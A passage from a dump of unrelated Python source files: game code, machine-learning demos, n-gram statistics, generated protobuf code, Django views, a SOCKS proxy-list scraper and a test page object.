                data.coconutsAI1.append(Coconuts(xPosition3,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(xPosition2+410,0))
                data.coconutsAI2.append(Coconuts(xPosition3+410,0))
        addExtraCoconut(data)
        addPowerUpsAI(data)
def addExtraCoconut(data):
    """Periodically drop extras on the tree-edge columns (left/right lane
    mirrored), plus pause power-ups on a slower cadence."""
    #adds drops to edges of trees
    if data.time % (18) ==0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(140,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(540,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(344,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(755,0))
    if data.time % 37 == 0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(140,0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(550,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(344,0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(755,0))
def addPowerUpsAI(data):
    """Randomly add invincibility power-ups (falling) and spiders (rising
    from y=750) on a random side of each lane."""
    #randomly add powerups on tree
    if data.time%33 == 0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.invincible.append(Invincible(140,0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(550,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.invincible.append(Invincible(344,0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(755,0))
    if data.time %66==0:
        side = random.choice(data.sides)
        if side == "l":
            data.scaryBug.append(ScaryBug(140,750))
            data.scaryBug.append(ScaryBug(550,750))
        elif side =="r":
            data.scaryBug.append(ScaryBug(344,750))
            # NOTE(review): 750 here vs 755 used for the right lane everywhere
            # else in this file -- possibly a typo; confirm intended x.
            data.scaryBug.append(ScaryBug(750,750))
def AIKeyPressed(event, data):
    """Handle keys during the AI race: "r" restarts the app; Left/Right move
    the human player between the two columns while the race is undecided."""
    key = event.keysym
    if key == "r":
        init(data)
    if data.winner is not None:
        return
    if key == "Left" and not data.onLeft1:
        data.onLeft1 = True
        data.player2X = 550
    elif key == "Right" and data.onLeft1:
        data.onLeft1 = False
        data.player2X = 750
def AIMousePressed(event, data): checkHome(event, data)
def AITimerFired(data):
    """Per-tick update for the AI race: collision checks (run twice, before
    and after movement), drop motion, climbing, spawning, and win detection."""
    if data.winner == None:
        #want to check hit twice (before & after elements move)
        if data.Invincible1 == False:hitAI1(data, 31)
        if data.Invincible2 == True: pass
        elif data.Invincible2 == False:hitAI2(data, 31)
        for coconut in data.coconutsAI1:
            if data.pause1Drop == False:coconut.onTimerFired(data)
        for coconut in data.coconutsAI2:
            if data.pause2Drop == False:coconut.onTimerFired(data)
        # second check with a tighter threshold after things have moved
        if data.Invincible1 == False:hitAI1(data,13)
        if data.Invincible2 == True:pass
        elif data.Invincible2 == False:hitAI2(data,13)
        data.player1Y-=data.speedAI
        #establishing winner: first bug past y=15 wins; both past => tie
        if data.player1Y < 15 and data.player2Y >15: data.winner= "player1"
        if data.player1Y>40:
            data.time +=1
            coconutShotAI(data)
        data.player2Y-=data.speedAI
        if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2"
        if data.player2Y>40:
            data.time +=1
            coconutShotAI(data)
        if data.player1Y < 15 and data.player2Y <15: data.winner = "tie"
        for powerUp in data.powerUps: powerUp.onTimerFired(data)
        hitPause(data)
        powerUpAITimerFired(data)
def powerUpAITimerFired(data):
    """Advance power-ups and spiders, and expire a player's active effects
    once they have climbed 120 px past where the effect started."""
    #moves both sides symmetrically
    for powerUp in data.invincible:
        powerUp.onTimerFired(data)
        hitInvincible(data)
    for bug in data.scaryBug:
        bug.onTimerFired(data)
        hitScaryBug(data)
    if data.start1 != None:
        if abs(data.start1-data.player1Y) >= 120:
            data.pause1Drop = False
            data.Invincible1 = False
    if data.start2 != None:
        if abs(data.start2-data.player2Y) >= 120:
            data.pause2Drop = False
            data.Invincible2 = False
def AIRedrawAll(canvas, data):
    """Draw the split-screen AI race: both lanes, drops, power-ups, both lady
    bugs, lane labels, any end-of-game overlay, and the home button."""
    canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
    canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
    canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconutsAI1:
        coconut.draw(canvas)
    for coconut in data.coconutsAI2:
        coconut.draw(canvas)
    canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold",
                        fill = "yellow")
    canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold",
                        fill = "yellow")
    drawPowerups(canvas, data)
    canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
    canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
    AIWinner(canvas, data)
    drawHome(canvas, data)
def AIWinner(canvas, data):
    """Draw the end-of-race overlay once data.winner has been decided.

    Does nothing while data.winner is None (or any unrecognised value)."""
    banners = {
        "player1": "The Computer Won :(",
        "player2": "You Made it! You Won!",
        "tie": "Tie! You Both Made it!",
    }
    message = banners.get(data.winner)
    if message is None:
        return
    canvas.create_rectangle(0, 0, data.width, data.height, fill="black")
    canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width/2, 100, text=message,
                       font="Arial 23 bold", fill="yellow")
####################################
# ScoreBoard mode
####################################
def scoreboardKeyPressed(event, data):
    # "r" restarts the whole app from the splash screen.
    if event.keysym == "r": init(data)
# Clicks on the scoreboard only need to service the home button.
def scoreboardMousePressed(event, data): checkHome(event, data)
def scoreboardTimerFired(data):
    # Reuse the difficulty screen's ambient-rain animation.
    difficultyTimerFired(data)
def scoreboardRedrawAll(canvas, data):
    """Render the high-score screen: background, ambient rain, headings, and
    the top data.numScores entries read from score.txt (one "score,player"
    line per entry), best first."""
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_image(data.width/2, data.tbgY, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!",
                        font = "Arial 30 bold", fill = "yellow")
    canvas.create_text(data.width/2, data.S_P, text="Score_Player",
                        font = "Arial 20 bold", fill = "yellow")
    drawHome(canvas, data)
    # Re-read the score file each redraw so games finished this session show
    # up immediately.  (The original also had a bare no-op `data.savedScores`
    # expression statement here; removed.)
    data.savedScores = readFile("score.txt")
    scores = [line.split(",") for line in data.savedScores.splitlines()]
    # Sort numerically on the score column, then keep the best entries.
    scores = sorted(scores, key=lambda entry: int(entry[0]))
    top5 = scores[-data.numScores:]
    top5.reverse()
    for i in range(len(top5)):
        canvas.create_text(data.width/2, data.scoreShift+(i*50),
                            text = top5[i],
                            font = "Arial 18 bold", fill = "yellow")
####################################
# help mode
####################################
def helpKeyPressed(event, data):
    # "r" restarts the whole app from the splash screen.
    if event.keysym == "r": init(data)
# Clicks on the help screen only need to service the home button.
def helpMousePressed(event, data): checkHome(event, data)
def helpTimerFired(data):
    # Reuse the difficulty screen's ambient-rain animation.
    difficultyTimerFired(data)
def helpRedrawAll(canvas, data):
    """Render the static help image with rain falling over it."""
    canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawHome(canvas, data)
#######################################
# use the run function as-is from notes
#######################################
def run(width=15000, height=25000):
    """Standard animation driver: wires mouse/key/timer events to the
    mode-dispatched handlers and starts the Tk main loop.

    NOTE(review): the defaults (15000x25000) look like leftovers; the call
    below always passes 1000x1000 -- confirm before relying on them.
    """
    def redrawAllWrapper(canvas, data):
        canvas.delete(ALL)
        redrawAll(canvas, data)
        canvas.update()
    def mousePressedWrapper(event, canvas, data):
        mousePressed(event, data)
        redrawAllWrapper(canvas, data)
    def keyPressedWrapper(event, canvas, data):
        keyPressed(event, data)
        redrawAllWrapper(canvas, data)
    def timerFiredWrapper(canvas, data):
        timerFired(data)
        redrawAllWrapper(canvas, data)
        # pause, then call timerFired again
        canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
    # Set up data and call init
    class Struct(object): pass
    data = Struct()
    data.width = width
    data.height = height
    data.timerDelay = 100 # milliseconds
    # create the root and the canvas
    root = Tk()
    init(data)
    canvas = Canvas(root, width=data.width, height=data.height)
    canvas.pack()
    # set up events
    root.bind("<Button-1>", lambda event:
                            mousePressedWrapper(event, canvas, data))
    root.bind("<Key>", lambda event:
                            keyPressedWrapper(event, canvas, data))
    timerFiredWrapper(canvas, data)
    # and launch the app
    root.mainloop()  # blocks until window is closed
    print("bye!")
run(1000, 1000)  # launch the game at 1000x1000
|
471 | d0448ca8e3fd2f3bb8a3a7ec052e29ab0be6351a | import matplotlib.pyplot as plt
# Demo: project the iris data set to 2-D with PCA (unsupervised) and LDA
# (supervised) and scatter-plot each class in its own colour for comparison.
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
import pandas as pd
import numpy as np
from sklearn import datasets
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
# Alternative data sources, kept for reference:
# a = pd.read_csv('sample20170117_labeled_0207.csv')
# X = a.values[0: 100, 0: 110]
# y = a.values[0: 100, 110]
# y = np.array([1 if i == 1. else -1 for i in y])
iris = datasets.load_iris()
X = iris.data
y = iris.target
target_names = iris.target_names
# X, y = make_classification(n_samples=1000, n_features=100, n_classes=2)
# NOTE(review): this split is computed but never used below -- both PCA and
# LDA are fit on the full X.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
pca = PCA(n_components=2)
X_r = pca.fit(X).transform(X)
lda = LinearDiscriminantAnalysis(n_components=2)
X_r2 = lda.fit(X, y).transform(X)
# One figure per projection, one colour per class.
plt.figure()
colors = ['navy', 'turquoise', 'darkorange']
lw = 2
for color, i, target_name in zip(colors, [0, 1, 2], target_names):
    plt.scatter(X_r[y == i, 0], X_r[y == i, 1], color=color, alpha=.8, lw=lw, label=target_name)
plt.legend(loc='best', shadow=False, scatterpoints=1)
plt.title('pca')
plt.figure()
for color, i, target_name in zip(colors, [0, 1, 2], target_names):
    plt.scatter(X_r2[y == i, 0], X_r2[y == i, 1], alpha=.8, color=color, label=target_name)
plt.legend(loc='best', shadow=False, scatterpoints=1)
plt.title('lda')
plt.show()
|
472 | 6d7db5b9a64ec25763f5af6ceec1a46d629d549c | import re
import ngram
import smoothedNgram
def split_into_sentences(text):
    """Lower-case *text*, split it into sentences, print corpus statistics
    (via getSentences), and return the sentence list.

    The regex splits on whitespace that follows '.' or '?', with negative
    lookbehinds meant to skip abbreviations like "e.g." -- NOTE(review): the
    [A-Z][a-z] lookbehind can never match because the text has already been
    lower-cased; confirm whether that guard is still wanted.
    """
    text = text.lower()
    sentences = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', text)
    getSentences(sentences,text)
    return sentences
def getTextWithoutSpaces(text):
    """Delete newlines, then collapse each run of spaces to a single space."""
    flattened = text.replace("\n", "")
    return re.sub(" +", " ", flattened)
def getSentences(sentences, text):
    """Print sentence, word, and unique-token counts for *text*.

    Tokens are alphabetic words plus sentence terminators; both the sentence
    and unique counts subtract one to discount the trailing empty split /
    terminator token.
    """
    tokens = re.findall(r'\b[a-zA-Z]+|[.!?]', text)
    distinct_tokens = set(tokens)
    total_words = sum(len(sentence.lower().split()) for sentence in sentences)
    print('Total sentence in the text : ' + str(len(sentences) - 1))
    print('Total word in the text : ' + str(total_words))
    print('Unique word number : ' + str(len(distinct_tokens) - 1))
def getText():
    """Return the full contents of the corpus file.

    Uses a context manager so the file handle is closed deterministically
    (the original opened the file and never closed it).
    """
    with open("hw01_FireFairies.txt") as file:
        return file.read()
def listResults():
    """Run the full pipeline: print corpus statistics, then build and report
    the bigram/unigram models from the ngram module."""
    print('')
    split_into_sentences(getText())
    print('')
    words,listOfBigrams, unigramCounts, bigramCounts = ngram.createBigram(getTextWithoutSpaces(getText()))
    listOfProbBigram, listOfBigrams, listOfProbUnigram, words = ngram.calcBigramProb(words, listOfBigrams, unigramCounts, bigramCounts)
    words, flipped = ngram.maxUnigram(listOfProbBigram, listOfBigrams, listOfProbUnigram, words)
    ngram.findLeastValues(words, flipped)
if __name__ == '__main__':
    listResults()
|
473 | 654586443e96f84aae70b3ce3263b0458a27334b | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v1/proto/services/user_interest_service.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v1.proto.resources import user_interest_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v1/proto/services/user_interest_service.proto',
package='google.ads.googleads.v1.services',
syntax='proto3',
serialized_options=_b('\n$com.google.ads.googleads.v1.servicesB\030UserInterestServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v1/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V1.Services\312\002 Google\\Ads\\GoogleAds\\V1\\Services\352\002$Google::Ads::GoogleAds::V1::Services'),
serialized_pb=_b('\nBgoogle/ads/googleads_v1/proto/services/user_interest_service.proto\x12 google.ads.googleads.v1.services\x1a;google/ads/googleads_v1/proto/resources/user_interest.proto\x1a\x1cgoogle/api/annotations.proto\"/\n\x16GetUserInterestRequest\x12\x15\n\rresource_name\x18\x01 \x01(\t2\xcd\x01\n\x13UserInterestService\x12\xb5\x01\n\x0fGetUserInterest\x12\x38.google.ads.googleads.v1.services.GetUserInterestRequest\x1a/.google.ads.googleads.v1.resources.UserInterest\"7\x82\xd3\xe4\x93\x02\x31\x12//v1/{resource_name=customers/*/userInterests/*}B\xff\x01\n$com.google.ads.googleads.v1.servicesB\x18UserInterestServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v1/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V1.Services\xca\x02 Google\\Ads\\GoogleAds\\V1\\Services\xea\x02$Google::Ads::GoogleAds::V1::Servicesb\x06proto3')
,
dependencies=[google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_GETUSERINTERESTREQUEST = _descriptor.Descriptor(
name='GetUserInterestRequest',
full_name='google.ads.googleads.v1.services.GetUserInterestRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v1.services.GetUserInterestRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=195,
serialized_end=242,
)
DESCRIPTOR.message_types_by_name['GetUserInterestRequest'] = _GETUSERINTERESTREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetUserInterestRequest = _reflection.GeneratedProtocolMessageType('GetUserInterestRequest', (_message.Message,), dict(
DESCRIPTOR = _GETUSERINTERESTREQUEST,
__module__ = 'google.ads.googleads_v1.proto.services.user_interest_service_pb2'
,
__doc__ = """Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v1.services.UserInterestService.GetUserInterest].
Attributes:
resource_name:
Resource name of the UserInterest to fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v1.services.GetUserInterestRequest)
))
_sym_db.RegisterMessage(GetUserInterestRequest)
DESCRIPTOR._options = None
_USERINTERESTSERVICE = _descriptor.ServiceDescriptor(
name='UserInterestService',
full_name='google.ads.googleads.v1.services.UserInterestService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=245,
serialized_end=450,
methods=[
_descriptor.MethodDescriptor(
name='GetUserInterest',
full_name='google.ads.googleads.v1.services.UserInterestService.GetUserInterest',
index=0,
containing_service=None,
input_type=_GETUSERINTERESTREQUEST,
output_type=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2._USERINTEREST,
serialized_options=_b('\202\323\344\223\0021\022//v1/{resource_name=customers/*/userInterests/*}'),
),
])
_sym_db.RegisterServiceDescriptor(_USERINTERESTSERVICE)
DESCRIPTOR.services_by_name['UserInterestService'] = _USERINTERESTSERVICE
# @@protoc_insertion_point(module_scope)
|
474 | 7bd2a29bff1e435cf813dd54109d7f4e17612425 | #from tinyTensor.Node import Node
import tinyTensor
import plotly.plotly as py
from graphviz import render
#from tinyTensor.Operation import Operation
def init():
    # Reset the module-level default graph; Graph.set_default() installs one.
    global _default_graph
    _default_graph = None
def postOrder(node):
    """Return *node* and all of its ancestors in post-order.

    Node instances are visited depth-first through their inputNodes before
    being appended; anything that is not a tinyTensor Node (e.g. a raw
    constant) is appended as-is without recursion.
    """
    ordered = []
    def visit(current):
        if isinstance(current, tinyTensor.Node.Node):
            for upstream in current.inputNodes:
                visit(upstream)
        ordered.append(current)
    visit(node)
    return ordered
class Graph():
    """Computation graph: holds Node objects and can render itself (or a
    layered network) to a Graphviz .gv file."""
    def __init__(self):
        self.nodes = []
        self.placeholderNames = []
    def appendNode(self,node):
        """Register *node*; placeholder names must be unique within a graph."""
        if(node.name in self.placeholderNames and node.isPlaceholder):
            raise Exception("Placeholder name \"{}\" is already in use in current graph".format(node.name))
        elif(node.isPlaceholder):
            self.placeholderNames.append(node.name)
        self.nodes.append(node)
    def set_default(self):
        """Install this graph as the module-wide default (see init())."""
        init()
        global _default_graph
        _default_graph = self
    def visualize_nodes(self, node):
        """Write network.gv describing the expression tree rooted at *node*
        (or a list of roots), then echo the file text to stdout."""
        # generating the .gv file
        gv_file = "graph \"\" \n{\n"
        # Module-level counter gives every emitted node a unique "nN" id.
        global nodeCounter
        nodeCounter = 0
        def recurse(nodes,gv_file,parent_node_str = None):
            global nodeCounter
            nodes_list = []
            if(isinstance(nodes,list)):
                nodes_list.extend(nodes)
            else:
                nodes_list.append(nodes)
            for node in nodes_list:
                # node should add itself to the list
                current_node_str = "n" + str(nodeCounter)
                nodeCounter += 1
                ''' operation might contain non-node constants, hence need to make sure that they are converted to node'''
                if(type(node) in (int,float)):
                    node = tinyTensor.Node.Node.variable(node) # creating a variable node
                '''creating the node labels'''
                if(isinstance(node,tinyTensor.Operation.Operation)):
                    gv_file += current_node_str + " [label=\"{} ({})\"] ;\n".format(node.operator,node.value)
                elif(node.isPlaceholder):
                    gv_file += current_node_str + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
                else:
                    gv_file += current_node_str + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
                # now creating connection line to parent(s) TODO: make it possible to have many parents, (nodes should have output nodes list)
                if(parent_node_str != None):
                    gv_file += parent_node_str + " -- " + current_node_str + "; \n"
                # applying the same to the children of this node
                if(len(node.inputNodes) > 0):
                    gv_file = recurse(node.inputNodes,gv_file,current_node_str)
            return gv_file
        gv_file = recurse(node,gv_file)
        gv_file += "}\n"
        with open("network.gv","w+") as file:
            file.writelines(gv_file)
        #render('dot','png','network.gv')
        print(gv_file)
    def visualize_layers(self,layer_list):
        """Write network.gv for a layered network: input nodes, then every
        neuron per layer, then the neuron-to-input links."""
        neuron_dict = {}
        #generating dict of neurons
        gv_file = "graph \"\" \n{\n"
        #dealing with input nodes
        for node in layer_list[0].inputList:
            neuron_dict[node] = node.name
            gv_file += neuron_dict[node] + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
        # creating dict for neurons
        for layer in layer_list:
            for neuron in layer.neuronList:
                neuron_dict[neuron] = "{}".format(neuron.name)
                gv_file += neuron_dict[neuron] + " [label=\"{}({})\"] ;\n".format(neuron.name,neuron.value)
        # drawing links between neurons
        for layer in layer_list:
            for neuron in layer.neuronList:
                for input_neuron in neuron.inputNeurons:
                    gv_file += neuron_dict[neuron] + " -- " + neuron_dict[input_neuron] + "; \n"
        gv_file += "}\n"
        with open("network.gv","w+") as file:
            file.writelines(gv_file)
        print(gv_file)
|
475 | 22da05d9bf6139a0306bfb2d1df96e9e2cf6a0c6 | # vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
    """Show a user's profile page with their published-post count.

    When the profile owner views their own unverified account, an email
    verification form is shown; a valid POST activates the account and
    redirects back to this page.
    """
    import datetime
    user = get_object_or_404(auth_models.User, username=username, is_active=True)
    now = datetime.datetime.now()
    # Only count posts whose publish time has already passed.
    post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()
    # Needs verification?
    email_verification_form = None
    if request.user.id == user.id and not user.get_profile().is_verified:
        data = request.POST.copy() or None
        email_verification_form = users_forms.EmailVerificationForm(data=data)
        if email_verification_form.is_bound:
            email_verification_form.data['user'] = request.user
            if email_verification_form.is_valid():
                email_verification_form.save()
                messages.info(request, 'Tunnuksesi on aktivoitu!')
                return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
    # Avoid template namespace clash
    context = {
        'viewed_user': user,
        'post_count': post_count,
        'email_verification_form': email_verification_form,
    }
    req_ctx = RequestContext(request, context)
    return render_to_response('user.html', req_ctx)
def register(request):
    """Registration view, Django offers none.

    On a valid POST, creates the user, logs them in immediately, and
    redirects to their profile page.
    """
    data = request.POST.copy() or None
    user_creation_form = auth_forms.UserCreationForm(data)
    if user_creation_form.is_bound:
        if user_creation_form.is_valid():
            user = user_creation_form.save()
            # Re-authenticate so the session backend is attached to the user.
            user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])
            login(request, user)
            return HttpResponseRedirect(reverse('user', args=(user.username,)))
    context = {
        'user_creation_form': user_creation_form,
    }
    req_ctx = RequestContext(request, context)
    return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
    """Email a fresh verification code to the logged-in user, then redirect
    to their profile.  Maybe ajaxify this in the future.
    """
    if request.user.get_profile().is_verified:
        messages.info(request, 'Olet jo vahvistanut osoitteesi')
    else:
        verification_code = request.user.get_profile().gen_verification_code()
        extractx = {
            'code': verification_code,
        }
        subject = _('Verification code')
        email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)
        messages.info(request, 'Vahvistuskoodi on lรคhetetty sรคhkรถpostiisi')
    return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# EOF
|
476 | 40158bbfd9c95a8344f34431d0b0e98c4a1bf6ed | '''
Code for mmDGM
Author: Chongxuan Li (chongxuanli1991@gmail.com)
Version = '1.0'
'''
import gpulearn_mm_z_x
import sys, os
import time
import color
# Hyper-parameters come from the command line (hidden-layer sizes after the
# dataset name) and from environment variables (nz, stepsize, decay1, decay2,
# random_seed).
n_hidden = (500,500)
if len(sys.argv) > 2:
    n_hidden = tuple([int(x) for x in sys.argv[2:]])
nz=500
# `in` replaces the deprecated dict.has_key() -- works on Python 2 and 3.
if 'nz' in os.environ:
    nz = int(os.environ['nz'])
if 'stepsize' in os.environ:
    alpha = float(os.environ['stepsize'])
else:
    alpha = 3e-4
if 'decay1' in os.environ:
    decay1 = float(os.environ['decay1'])
else:
    decay1 = 0.1
if 'decay2' in os.environ:
    decay2 = float(os.environ['decay2'])
else:
    decay2 = 0.001
# random_seed semantics: 1 -> seed from the wall clock; >1 -> use the value.
if 'random_seed' in os.environ:
    seed = 0
    if int(os.environ['random_seed']) == 1:
        seed = int(time.time())
    # BUG FIX: was `if int(os.environ['random_seed'] > 1):` -- the comparison
    # sat inside int(), and (Python 2) str > int is always True, so this
    # branch always ran and clobbered the time-based seed whenever
    # random_seed == 1.
    if int(os.environ['random_seed']) > 1:
        seed = int(os.environ['random_seed'])
    color.printRed('random_seed ' + str(seed))
else:
    seed = int(time.time())
    color.printRed('random_seed ' + str(seed))
    #print 'random_seed (bool) missing.'
    #exit()
gpulearn_mm_z_x.main(dataset=sys.argv[1], n_z=nz, n_hidden=n_hidden, seed=seed, comment='', alpha=alpha, decay1=decay1, decay2=decay2, gfx=True)
#gpulearn_z_x.main(n_data=50000, dataset='svhn_pca', n_z=300, n_hidden=(500,500), seed=0)
|
# Bottom six cells of the board grid (rows 2-3).  Each button hands itself to
# checker(); the lambdas are safe despite late binding because each one names
# its own button explicitly.
# NOTE(review): the original spelled the option "heigh" -- Tcl tolerates it
# only as an unambiguous abbreviation; the canonical tkinter option is
# "height", used here.
button6 = Button(tk, text=" ", font=('Times 26 bold'), height=4, width=8,
                 command=lambda: checker(button6))
button6.grid(row=2, column=2, sticky=S+N+E+W)
button7 = Button(tk, text=" ", font=('Times 26 bold'), height=4, width=8,
                 command=lambda: checker(button7))
button7.grid(row=3, column=0, sticky=S+N+E+W)
button8 = Button(tk, text=" ", font=('Times 26 bold'), height=4, width=8,
                 command=lambda: checker(button8))
button8.grid(row=3, column=1, sticky=S+N+E+W)
button9 = Button(tk, text=" ", font=('Times 26 bold'), height=4, width=8,
                 command=lambda: checker(button9))
button9.grid(row=3, column=2, sticky=S+N+E+W)
# Hand control to Tk's event loop; blocks until the window is closed.
tk.mainloop()
478 | 647dde6e3288ded29336062b78baacc3a92908a7 | import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
    """Fetch the spys.one SOCKS listing page and return the hidden "xx0"
    token that must accompany the filtered POST request."""
    res = session.post("https://spys.one/en/socks-proxy-list/")
    soup = BeautifulSoup(res.text, 'html.parser')
    return soup.find("input", {"name": "xx0"}).get("value")
def _get_proxy_list(session, xx0):
    """POST the filter form and return a list of "ip:port" strings.

    The port digits are obfuscated by inline JavaScript, so the page's
    <script> is evaluated with js2py, each per-row script rendered through a
    stubbed document.write, and the HTML tags stripped from the result.
    The xf5=2 form field selects SOCKS proxies.
    """
    res = session.post("https://spys.one/en/socks-proxy-list/",
                       data=f"xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}",
                       headers={
                           "Content-Type": "application/x-www-form-urlencoded",
                       })
    soup = BeautifulSoup(res.text, 'html.parser')
    js = js2py.EvalJs({"document": {"write": lambda a: a}})
    js.execute(soup.select_one("body > script").string)
    addrs = soup.select("tr[onmouseover] > td:first-child")
    ports = [js.eval(i.find("script").string) for i in addrs]
    addrs = [i.get_text() for i in addrs]
    # The rendered port snippets still contain markup -- strip the tags.
    ports = [re.sub(r"<[^<]*>", "", i) for i in ports]
    return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
    """Scrapes spys.one for SOCKS5 proxies and hands out random entries."""
    def __init__(self):
        # List of "socks5://ip:port" URLs; empty until refresh() succeeds.
        self._proxies = []
    def refresh(self):
        """Re-scrape the proxy list using a fresh session and random UA."""
        session = requests.Session()
        session.headers["User-Agent"] = UserAgent().random
        print("Rotating proxy list")
        xx0 = _get_request_key(session)
        print(f"Got proxy request key xx0={xx0}")
        addrs = _get_proxy_list(session, xx0)
        self._proxies = [f"socks5://{i}" for i in addrs]
        print(f"Got {len(self._proxies)} proxies")
    def random(self):
        """Return one random proxy URL; refresh() must have run first."""
        # NOTE(review): assert is stripped under `python -O`; raising an
        # explicit exception would be safer, but would change the error type
        # callers currently see (AssertionError).
        assert(len(self._proxies) > 0)
        return random.choice(self._proxies)
|
479 | aebc8665a97ab0a71b1d8a920b5cbf2643254883 | from base_page import Base_Page
import locators
class Product_Object:
    "Page Object for the table"
    #locators: this object relies on xpath attributes (rows_xpath,
    # cols_relative_xpath, cols_header) and element helpers (get_elements,
    # get_dom_text, write).  NOTE(review): none are defined in this class;
    # presumably inherited from Base_Page or a subclass -- confirm.
    def get_all_text(self):
        "Get the text within the table"
        # Returns a list of rows, each row a list of cell strings.
        table_text = []
        row_doms = self.get_elements(self.rows_xpath)
        for index,row_dom in enumerate(row_doms):
            row_text = []
            # xpath rows are 1-indexed, hence index+1.
            cell_doms = self.get_elements(self.cols_relative_xpath%(index+1))
            for cell_dom in cell_doms:
                row_text.append(self.get_dom_text(cell_dom))
            table_text.append(row_text)
        return table_text
    def get_num_rows(self):
        "Get the total number of rows in the table"
        #NOTE: We do not count the header row
        row_doms = self.get_elements(self.rows_xpath)
        return len(row_doms)
    def get_num_cols(self):
        "Return the number of columns"
        #NOTE: We just count the columns in the header row
        col_doms = self.get_elements(self.cols_header)
        return len(col_doms)
    def get_column_text(self,column_name):
        "Get the text within a column"
        # NOTE(review): unimplemented stub -- check_cell_text_present() with a
        # specific column_name will wrap this None and fail when iterating it.
        pass
    def get_column_names(self):
        "Return a list with the column names"
        column_names = []
        col_doms = self.get_elements(self.cols_header)
        for col_dom in col_doms:
            column_names.append(self.get_dom_text(col_dom))
        return column_names
    def check_cell_text_present(self,text,column_name='all'):
